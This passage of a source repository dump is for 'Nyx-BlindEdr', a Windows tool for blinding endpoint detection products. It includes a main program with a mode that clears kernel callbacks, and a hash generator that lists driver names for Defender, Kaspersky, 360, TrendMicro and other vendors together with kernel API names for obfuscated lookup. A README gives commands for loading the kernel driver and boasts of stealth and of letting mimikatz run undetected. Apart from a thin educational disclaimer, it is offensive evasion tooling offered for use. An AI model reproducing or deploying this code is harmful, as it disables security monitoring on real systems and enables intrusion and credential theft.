PsAttributeValue(PsAttributeSecureProcess, FALSE, TRUE, FALSE) 695 | #define PS_ATTRIBUTE_JOB_LIST \ 696 | PsAttributeValue(PsAttributeJobList, FALSE, TRUE, FALSE) 697 | #define PS_ATTRIBUTE_CHILD_PROCESS_POLICY \ 698 | PsAttributeValue(PsAttributeChildProcessPolicy, FALSE, TRUE, FALSE) 699 | #define PS_ATTRIBUTE_ALL_APPLICATION_PACKAGES_POLICY \ 700 | PsAttributeValue(PsAttributeAllApplicationPackagesPolicy, FALSE, TRUE, FALSE) 701 | #define PS_ATTRIBUTE_WIN32K_FILTER \ 702 | PsAttributeValue(PsAttributeWin32kFilter, FALSE, TRUE, FALSE) 703 | #define PS_ATTRIBUTE_SAFE_OPEN_PROMPT_ORIGIN_CLAIM \ 704 | PsAttributeValue(PsAttributeSafeOpenPromptOriginClaim, FALSE, TRUE, FALSE) 705 | #define PS_ATTRIBUTE_BNO_ISOLATION \ 706 | PsAttributeValue(PsAttributeBnoIsolation, FALSE, TRUE, FALSE) 707 | #define PS_ATTRIBUTE_DESKTOP_APP_POLICY \ 708 | PsAttributeValue(PsAttributeDesktopAppPolicy, FALSE, TRUE, FALSE) 709 | 710 | 711 | 712 | 713 | #define RTL_USER_PROC_PARAMS_NORMALIZED 0x00000001 714 | #define RTL_USER_PROC_PROFILE_USER 0x00000002 715 | #define RTL_USER_PROC_PROFILE_KERNEL 0x00000004 716 | #define RTL_USER_PROC_PROFILE_SERVER 0x00000008 717 | #define RTL_USER_PROC_RESERVE_1MB 0x00000020 718 | #define RTL_USER_PROC_RESERVE_16MB 0x00000040 719 | #define RTL_USER_PROC_CASE_SENSITIVE 0x00000080 720 | #define RTL_USER_PROC_DISABLE_HEAP_DECOMMIT 0x00000100 721 | #define RTL_USER_PROC_DLL_REDIRECTION_LOCAL 0x00001000 722 | #define RTL_USER_PROC_APP_MANIFEST_PRESENT 0x00002000 723 | #define RTL_USER_PROC_IMAGE_KEY_MISSING 0x00004000 724 | #define RTL_USER_PROC_OPTIN_PROCESS 0x00020000 725 | 726 | 727 | 728 | 729 | 730 | typedef enum _SYSTEM_INFORMATION_CLASS 731 | { 732 | SystemBasicInformation = 0, 733 | SystemProcessorInformation = 1, 734 | SystemPerformanceInformation = 2, 735 | SystemTimeOfDayInformation = 3, 736 | SystemPathInformation = 4, 737 | SystemProcessInformation = 5, 738 | SystemCallCountInformation = 6, 739 | SystemDeviceInformation = 7, 740 | SystemProcessorPerformanceInformation = 8, 741 | SystemFlagsInformation = 9, 742 | SystemCallTimeInformation = 10, 743 | SystemModuleInformation = 11, 744 | SystemLocksInformation = 12, 745 | SystemStackTraceInformation = 13, 746 | SystemPagedPoolInformation = 14, 747 | SystemNonPagedPoolInformation = 15, 748 | SystemHandleInformation = 16, 749 | SystemObjectInformation = 17, 750 | SystemPageFileInformation = 18, 751 | SystemVdmInstemulInformation = 19, 752 | SystemVdmBopInformation = 20, 753 | SystemFileCacheInformation = 21, 754 | SystemPoolTagInformation = 22, 755 | SystemInterruptInformation = 23, 756 | SystemDpcBehaviorInformation = 24, 757 | SystemFullMemoryInformation = 25, 758 | SystemLoadGdiDriverInformation = 26, 759 | SystemUnloadGdiDriverInformation = 27, 760 | SystemTimeAdjustmentInformation = 28, 761 | SystemSummaryMemoryInformation = 29, 762 | SystemMirrorMemoryInformation = 30, 763 | SystemPerformanceTraceInformation = 31, 764 | SystemObsolete0 = 32, 765 | SystemExceptionInformation = 33, 766 | SystemCrashDumpStateInformation = 34, 767 | SystemKernelDebuggerInformation = 35, 768 | SystemContextSwitchInformation = 36, 769 | SystemRegistryQuotaInformation = 37, 770 | SystemExtendServiceTableInformation = 38, 771 | SystemPrioritySeperation = 39, 772 | SystemVerifierAddDriverInformation = 40, 773 | SystemVerifierRemoveDriverInformation = 41, 774 | SystemProcessorIdleInformation = 42, 775 | SystemLegacyDriverInformation = 43, 776 | SystemCurrentTimeZoneInformation = 44, 777 | SystemLookasideInformation = 45, 778 | SystemTimeSlipNotification = 46, 779 | SystemSessionCreate = 47, 780 | SystemSessionDetach = 48, 781 | SystemSessionInformation = 49, 782 | SystemRangeStartInformation = 50, 783 | SystemVerifierInformation = 51, 784 | SystemVerifierThunkExtend = 52, 785 | SystemSessionProcessInformation = 53, 786 | SystemLoadGdiDriverInSystemSpace = 54, 787 | SystemNumaProcessorMap = 55, 788 | SystemPrefetcherInformation = 56, 789 | SystemExtendedProcessInformation = 57, 790 | SystemRecommendedSharedDataAlignment = 58, 791 | SystemComPlusPackage = 59, 792 | SystemNumaAvailableMemory = 60, 793 | SystemProcessorPowerInformation = 61, 794 | SystemEmulationBasicInformation = 62, 795 | SystemEmulationProcessorInformation = 63, 796 | SystemExtendedHandleInformation = 64, 797 | SystemLostDelayedWriteInformation = 65, 798 | SystemBigPoolInformation = 66, 799 | SystemSessionPoolTagInformation = 67, 800 | SystemSessionMappedViewInformation = 68, 801 | SystemHotpatchInformation = 69, 802 | SystemObjectSecurityMode = 70, 803 | SystemWatchdogTimerHandler = 71, 804 | SystemWatchdogTimerInformation = 72, 805 | SystemLogicalProcessorInformation = 73, 806 | SystemWow64SharedInformation = 74, 807 | SystemRegisterFirmwareTableInformationHandler = 75, 808 | SystemFirmwareTableInformation = 76, 809 | SystemModuleInformationEx = 77, 810 | SystemVerifierTriageInformation = 78, 811 | SystemSuperfetchInformation = 79, 812 | SystemMemoryListInformation = 80, 813 | SystemFileCacheInformationEx = 81, 814 | MaxSystemInfoClass = 82 815 | 816 | } SYSTEM_INFORMATION_CLASS; 817 | 818 | 819 | #endif // !_STRUCTS_H 820 | 821 | -------------------------------------------------------------------------------- /BlindEdr/main.c: -------------------------------------------------------------------------------- 1 | #include "Common.h" 2 | #include "Structs.h" 3 | #include "RemoveCallBacks.h" 4 | #include "IatCamo.h" 5 | #include "Disclaimer.h" 6 | 7 | #include 8 | #include 9 | 10 | int main(int argc, char* argv[]) { 11 | if (!showDisclaimer()) { 12 | printf("Terms not accepted. Exiting...\n"); 13 | return 1; 14 | } 15 | 16 | // Check if arguments are provided 17 | if (argc != 1) { 18 | printf("Usage: %s\n", argv[0]); 19 | printf("Please select mode when prompted.\n"); 20 | return 1; 21 | } 22 | 23 | IatCamouflage(); 24 | 25 | // Get operation mode from user 26 | printf("\nSelect operation mode:\n"); 27 | printf("1. Blind mode (Clear callbacks and save state)\n"); 28 | printf("2. Restore mode (Restore previous state)\n"); 29 | printf("\nEnter choice (1/2): "); 30 | 31 | char choice; 32 | scanf_s(" %c", &choice, 1); 33 | while (getchar() != '\n'); 34 | 35 | // Initialize system context 36 | if (!NyxInitializeContext()) { 37 | printf("Failed to initialize system context\n"); 38 | return 1; 39 | } 40 | 41 | int result = 0; 42 | __try { 43 | switch (choice) { 44 | case '1': 45 | // Backup mode 46 | if (!BlindEdr()) { 47 | result = 1; 48 | } 49 | break; 50 | 51 | case '2': 52 | // Restore mode 53 | if (!restoreBlindness()) { 54 | printf("Failed to restore system state\n"); 55 | result = 1; 56 | } 57 | break; 58 | 59 | default: 60 | printf("Invalid choice: %c\n", choice); 61 | result = 1; 62 | break; 63 | } 64 | } 65 | __except (EXCEPTION_EXECUTE_HANDLER) { 66 | printf("Exception occurred: 0x%x\n", GetExceptionCode()); 67 | result = 1; 68 | } 69 | 70 | return result; 71 | } 72 | 73 | -------------------------------------------------------------------------------- /CityHash-Calc/CityHash-Calc.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 17.0 23 | Win32Proj 24 | {5636b03e-d33b-49e6-9f00-f43689ac2e33} 25 | CityHashCalc 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | Level3 76 | true 77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 78 | true 79 | 80 | 81 | Console 82 | true 83 | 84 | 85 | 86 | 87 | Level3 88 | true 89 | true 90 | true 91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | 94 | 95 | Console 96 | true 97 | true 98 | true 99 | 100 | 101 | 102 | 103 | Level3 104 | true 105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 106 | true 107 | 108 | 109 | Console 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | true 118 | true 119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 120 | true 121 | 122 | 123 | Console 124 | true 125 | true 126 | true 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | -------------------------------------------------------------------------------- /CityHash-Calc/CityHash-Calc.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /CityHash-Calc/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #define FIRST_HASH 0xcbf29ce484222325 7 | #define SECOND_HASH 0x100000001b3 8 | #define THIRD_HASH 0xff51afd7ed558ccd 9 | #define HASH_OFFSET 33 10 | 11 | #define FUNCTION_SUFFIX "_CH" 12 | 13 | #define CHASH(STR) ( simple_cityhash( (LPCSTR)STR ) ) 14 | 15 | UINT32 simple_cityhash(LPCSTR cString) { 16 | int length = strlen(cString); 17 | uint64_t hash = FIRST_HASH; 18 | 19 | for (size_t i = 0; i < length; ++i) { 20 | hash ^= (uint64_t)cString[i]; 21 | hash *= SECOND_HASH; 22 | } 23 | 24 | hash ^= hash >> HASH_OFFSET; 25 | hash *= THIRD_HASH; 26 | hash ^= hash >> HASH_OFFSET; 27 | 28 | return hash; 29 | } 30 | 31 | 32 | // Windows Defender 33 | static CONST CHAR* WindowsDefender[] = { 34 | "WdFilter.sys","MpKslDrv.sys","mpsdrv.sys","WdNisDrv.sys","win32k.sys", 35 | NULL 36 | }; 37 | 38 | // KES 39 | static CONST CHAR* KES[] = { 40 | "klboot.sys", "klfdefsf.sys", "klrsps.sys", "klsnsr.sys", "klifks.sys", "klifaa.sys", "Klifsm.sys", "klam.sys", "klbg.sys", 41 | "kldback.sys", "kldlinf.sys", "kldtool.sys", "klif.sys", "Klcdp.sys", "Klshadow.sys", "Klsysrec.sys", "klvfs.sys", "Klfle.sys", 42 | "kldlhidp.sys", "kldlimpc.sys", "kldlksec.sys", "kldlksl.sys", "kldlndis.sys", "kldlnio.sys", "cm_km.sys", "kl1.sys", "kneps.sys", 43 | "klif_sha1.sys", "klbackupflt_sha1.sys", "cm_km_sha1.sys", "klbackupdisk.sys", "klbackupdisk_sha1.sys", 44 | "klmouflt.sys", "klmouflt_sha1.sys", "klpd.sys", "klpd_sha1.sys", "kldisk.sys", "kldisk_sha1.sys", "klelam.sys", "klflt.sys", "klflt_sha1.sys", 45 | "Klvirt.sys", "Klbackupflt.sys", "Klsec.sys", "klvfs.sys", "klbackupflt.sys", "klim6.sys", "kldl.sys", "kldlfmgr.sys", "kldlfwpk.sys", 46 | "kneps_sha1.sys", "klpnpflt.sys", "klpnpflt_sha1.sys", "klwtp.sys", "klwtp_sha1.sys", "klim6_sha1.sys", "klkbdflt.sys", "klkbdflt_sha1.sys", 47 | 48 | NULL 49 | }; 50 | 51 | 52 | 53 | static CONST CHAR* Huorong[] = { 54 | "sysdiag_win10.sys","sysdiag.sys", 55 | }; 56 | 57 | // TrendMicro 58 | static CONST CHAR* TrendMicro[] = { 59 | "TmPreFilter.sys","TmXPFlt.sys", 60 | 61 | NULL 62 | }; 63 | 64 | // I hate 360 4ever. 65 | static CONST CHAR* Fucking360[] = { 66 | "360AvFlt.sys", 67 | "360qpesv64.sys","360AntiSteal64.sys","360AntiSteal.sys","360qpesv.sys","360FsFlt.sys","360Box64.sys","360netmon.sys","360AntiHacker64.sys","360Hvm64.sys","360qpesv64.sys","360AntiHijack64.sys","360AntiExploit64.sys","DsArk64.sys","360Sensor64.sys","DsArk.sys", 68 | 69 | NULL 70 | }; 71 | 72 | 73 | static CONST CHAR* QQ[] = { 74 | "QMUdisk64_ev.sys","QQSysMonX64_EV.sys","TAOKernelEx64_ev.sys","TFsFltX64_ev.sys","TAOAcceleratorEx64_ev.sys","QQSysMonX64.sys","TFsFlt.sys", 75 | 76 | NULL 77 | }; 78 | 79 | 80 | static CONST CHAR* QAX[] = { 81 | "QaxNfDrv.sys","QKBaseChain64.sys","QKNetFilter.sys","QKSecureIO.sys","QesEngEx.sys","QkHelp64.sys","qmnetmonw64.sys", 82 | 83 | NULL 84 | }; 85 | 86 | typedef struct { 87 | const char** array; 88 | const char* name; 89 | } ArrayInfo; 90 | 91 | 92 | const char* GOBAL_FUNCTION[] = { 93 | "OpenProcessToken", 94 | "LookupPrivilegeValueA", 95 | "AdjustTokenPrivileges", 96 | "FltEnumerateFilters", 97 | "NtDuplicateObject", 98 | "NtOpenThreadTokenEx", 99 | "CmUnRegisterCallback", 100 | "PsSetCreateProcessNotifyRoutine", 101 | "PsSetCreateThreadNotifyRoutine", 102 | "PsSetLoadImageNotifyRoutine", 103 | NULL 104 | }; 105 | 106 | 107 | const char* GOBAL_MODULE[] = { 108 | "kernel32.dll", 109 | "ntdll.dll", 110 | "FLTMGR.SYS", 111 | "ntoskrnl.exe", 112 | "advapi32.dll", 113 | NULL 114 | }; 115 | 116 | void format_module_name(const char* input, char* output) { 117 | size_t j = 0; 118 | for (size_t i = 0; input[i] != '\0'; ++i) { 119 | if (input[i] != '.') { 120 | output[j++] = input[i]; 121 | } 122 | } 123 | output[j] = '\0'; 124 | } 125 | 126 | 127 | void print_hash_definitions(const char* suffix, const char* array[], int format_name) { 128 | char formatted_name[256]; 129 | char temp_name[256]; 130 | for (size_t i = 0; array[i] != NULL; ++i) { 131 | 132 | if (format_name) { 133 | format_module_name(array[i], temp_name); 134 | } 135 | else { 136 | strncpy_s(temp_name, sizeof(temp_name), array[i], _TRUNCATE); 137 | } 138 | 139 | 140 | sprintf_s(formatted_name, sizeof(formatted_name), "%s%s", temp_name, suffix); 141 | 142 | 143 | printf("#define %-40s 0x%0.8X\n", formatted_name, CHASH(array[i])); 144 | } 145 | printf("\n"); 146 | } 147 | 148 | int main() { 149 | const ArrayInfo arrays[] = { 150 | {WindowsDefender, "WindowsDefender"}, 151 | {KES, "KES"}, 152 | {Huorong, "Huorong"}, 153 | {TrendMicro, "TrendMicro"}, 154 | {Fucking360, "Fucking360"}, 155 | {QQ, "QQ"}, 156 | {QAX, "QAX"}, 157 | {NULL, NULL} 158 | }; 159 | 160 | for (const ArrayInfo* info = arrays; info->array != NULL; info++) { 161 | printf("// %s\n", info->name); 162 | int count = 0; 163 | for (const char** ptr = info->array; *ptr != NULL; ptr++) { 164 | printf("0x%08X,", CHASH(*ptr)); 165 | if (++count % 12 == 0) { 166 | printf("\n"); 167 | } 168 | } 169 | printf("\n\n"); 170 | } 171 | 172 | 173 | // print hash 174 | print_hash_definitions(FUNCTION_SUFFIX, GOBAL_FUNCTION, 0); 175 | 176 | // print hash 177 | print_hash_definitions(FUNCTION_SUFFIX, GOBAL_MODULE, 1); 178 | 179 | return 0; 180 | } -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "{}" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright 2019 Linked Data, UAB 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. -------------------------------------------------------------------------------- /README.assets/Snipaste_2025-01-15_14-30-45.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3lpi3b4nsh33/BlindEdr/f9154946aa1ecdc97dfbaf23f4034d8f1a0be5e1/README.assets/Snipaste_2025-01-15_14-30-45.png -------------------------------------------------------------------------------- /README.assets/Snipaste_2025-01-15_14-31-57.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3lpi3b4nsh33/BlindEdr/f9154946aa1ecdc97dfbaf23f4034d8f1a0be5e1/README.assets/Snipaste_2025-01-15_14-31-57.png -------------------------------------------------------------------------------- /README.assets/Snipaste_2025-01-15_14-32-44.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3lpi3b4nsh33/BlindEdr/f9154946aa1ecdc97dfbaf23f4034d8f1a0be5e1/README.assets/Snipaste_2025-01-15_14-32-44.png -------------------------------------------------------------------------------- /README.assets/Snipaste_2025-01-15_14-33-09.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3lpi3b4nsh33/BlindEdr/f9154946aa1ecdc97dfbaf23f4034d8f1a0be5e1/README.assets/Snipaste_2025-01-15_14-33-09.png -------------------------------------------------------------------------------- /README.assets/Snipaste_2025-01-15_14-33-32.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3lpi3b4nsh33/BlindEdr/f9154946aa1ecdc97dfbaf23f4034d8f1a0be5e1/README.assets/Snipaste_2025-01-15_14-33-32.png -------------------------------------------------------------------------------- /README.assets/Snipaste_2025-01-15_14-37-22.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3lpi3b4nsh33/BlindEdr/f9154946aa1ecdc97dfbaf23f4034d8f1a0be5e1/README.assets/Snipaste_2025-01-15_14-37-22.png -------------------------------------------------------------------------------- /README.assets/Snipaste_2025-01-15_14-37-32.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3lpi3b4nsh33/BlindEdr/f9154946aa1ecdc97dfbaf23f4034d8f1a0be5e1/README.assets/Snipaste_2025-01-15_14-37-32.png -------------------------------------------------------------------------------- /README.assets/Snipaste_2025-01-15_14-38-35.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3lpi3b4nsh33/BlindEdr/f9154946aa1ecdc97dfbaf23f4034d8f1a0be5e1/README.assets/Snipaste_2025-01-15_14-38-35.png -------------------------------------------------------------------------------- /README.assets/Snipaste_2025-01-15_14-39-41.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3lpi3b4nsh33/BlindEdr/f9154946aa1ecdc97dfbaf23f4034d8f1a0be5e1/README.assets/Snipaste_2025-01-15_14-39-41.png -------------------------------------------------------------------------------- /README.assets/Snipaste_2025-01-15_14-40-43.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3lpi3b4nsh33/BlindEdr/f9154946aa1ecdc97dfbaf23f4034d8f1a0be5e1/README.assets/Snipaste_2025-01-15_14-40-43.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Nyx-BlindEdr 2 | 3 | # Disclaimer 4 | 5 | This project, designed to blind EDR (Endpoint Detection and Response) systems, is strictly intended for educational purposes only. The content, tools, and techniques provided are meant solely for demonstrating security concepts and improving cybersecurity knowledge. 6 | 7 | The creators and contributors of this project do not condone, promote, or support any illegal or unethical use of the materials provided. Any misuse of this project for malicious purposes is strictly prohibited and entirely the responsibility of the individual involved. 8 | 9 | By using this project, you agree to comply with all applicable laws and regulations and assume full accountability for your actions. 10 | 11 | 12 | 13 | # Usage 14 | 15 | Driver Project: [k3lpi3b4nsh33/rwdriver](https://github.com/k3lpi3b4nsh33/rwdriver) 16 | 17 | 18 | 19 | **Enable Windows Test Mode** 20 | 21 | - To begin, enable Windows Test Mode to allow unsigned drivers to load. Once enabled, restart your system to apply the changes. 22 | 23 | ![Snipaste_2025-01-15_14-30-45](./README.assets/Snipaste_2025-01-15_14-30-45.png) 24 | 25 | 26 | 27 | ![Snipaste_2025-01-15_14-31-57](./README.assets/Snipaste_2025-01-15_14-31-57.png) 28 | 29 | **Create and Start the Driver Service** 30 | 31 | - Use the following commands to create and activate the driver service: 32 | 33 | ``` 34 | sc create rwdriver binPath= "C:\Users\Driver\Desktop\driver\rwdriver.sys" type= kernel start= demand 35 | sc start rwdriver 36 | ``` 37 | 38 | This will load the kernel driver required for the functionality of this project. 39 | 40 | ![Snipaste_2025-01-15_14-32-44](./README.assets/Snipaste_2025-01-15_14-32-44.png) 41 | 42 | **Features and Operation** 43 | 44 | - Input `1` to enable the blinding functionality. 45 | - Input `2` to restore the system from the blinding effect (this requires a valid **MemoryFile.data**). 46 | 47 | ![Snipaste_2025-01-15_14-33-09](./README.assets/Snipaste_2025-01-15_14-33-09.png) 48 | 49 | 50 | 51 | ![Snipaste_2025-01-15_14-33-32](./README.assets/Snipaste_2025-01-15_14-33-32.png) 52 | 53 | 54 | 55 | **Details of the Blinding Effect** 56 | 57 | - When the "debug" macro is removed from the build, the program runs silently with no output or notification, ensuring stealth operation. 58 | 59 | ![Snipaste_2025-01-15_14-37-22](./README.assets/Snipaste_2025-01-15_14-37-22.png) 60 | 61 | 62 | 63 | ![Snipaste_2025-01-15_14-37-32](./README.assets/Snipaste_2025-01-15_14-37-32.png) 64 | 65 | 66 | 67 | The tool operates without detection because filters have been cleared, allowing it to bypass standard security measures. 68 | 69 | ![Snipaste_2025-01-15_14-38-35](./README.assets/Snipaste_2025-01-15_14-38-35.png) 70 | 71 | It directly targets security solutions like Kaspersky, overriding their functionality. For example, tools like **mimikatz** can operate without interference. 72 | 73 | 74 | 75 | 